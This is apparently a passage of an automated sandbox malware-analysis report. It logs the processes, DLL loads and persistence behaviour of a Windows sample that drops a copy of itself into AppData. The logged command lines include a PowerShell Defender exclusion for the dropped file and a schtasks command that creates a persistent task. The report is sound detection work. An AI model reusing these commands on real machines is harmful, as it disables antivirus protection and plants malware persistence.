              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess created: C:\Users\user\AppData\Roaming\RTdozXra.exe "C:\Users\user\AppData\Roaming\RTdozXra.exe"
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe"Jump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Users\user\Desktop\vQyKfYxzXB.exe "C:\Users\user\Desktop\vQyKfYxzXB.exe"Jump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Users\user\Desktop\vQyKfYxzXB.exe "C:\Users\user\Desktop\vQyKfYxzXB.exe"Jump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Users\user\Desktop\vQyKfYxzXB.exe "C:\Users\user\Desktop\vQyKfYxzXB.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp9C1D.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess created: C:\Users\user\AppData\Roaming\RTdozXra.exe "C:\Users\user\AppData\Roaming\RTdozXra.exe"Jump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: vQyKfYxzXB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: vQyKfYxzXB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: vQyKfYxzXB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: Zfva.pdbSHA256 source: vQyKfYxzXB.exe, RTdozXra.exe.0.dr
              Source: Binary string: Zfva.pdb source: vQyKfYxzXB.exe, RTdozXra.exe.0.dr
              Source: vQyKfYxzXB.exeStatic PE information: 0xAF38D2CF [Mon Feb 26 17:33:03 2063 UTC]
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041A8DA
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_059266AD push esp; iretd 0_2_059266AE
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_076D72A5 push esp; iretd 0_2_076D72B9
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08D48DF9 push eax; mov dword ptr [esp], edx0_2_08D48E0C
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08D43698 push eax; ret 0_2_08D43A31
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08D44960 push eax; iretd 0_2_08D44961
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08EE7968 pushfd ; ret 0_2_08EE7969
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08EE7BAE pushfd ; ret 0_2_08EE7BAF
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08EE7541 pushfd ; ret 0_2_08EE7542
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_055566AD push esp; iretd 11_2_055566AE
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_072F3698 push eax; ret 11_2_072F3A31
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_072F4960 push eax; iretd 11_2_072F4961
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_07497541 pushfd ; ret 11_2_07497542
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_074904A0 pushfd ; ret 11_2_074904A1
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_07497D0A push esp; retf 11_2_07497D31
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_07497BAE pushfd ; ret 11_2_07497BAF
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_07497968 pushfd ; ret 11_2_07497969
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004000D8 push es; iretd 15_2_004000D9
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0040008C push es; iretd 15_2_0040008D
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004542E6 push ecx; ret 15_2_004542F9
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0045B4FD push esi; ret 15_2_0045B506
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00432BD6 push ecx; ret 15_2_00432BE9
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00454C08 push eax; ret 15_2_00454C26
              Source: vQyKfYxzXB.exeStatic PE information: section name: .text entropy: 7.800755325212195
              Source: RTdozXra.exe.0.drStatic PE information: section name: .text entropy: 7.800755325212195
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004063C6 ShellExecuteW,URLDownloadToFileW,15_2_004063C6
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeFile created: C:\Users\user\AppData\Roaming\RTdozXra.exeJump to dropped file

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp"
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,15_2_00418A00

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041A8DA
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
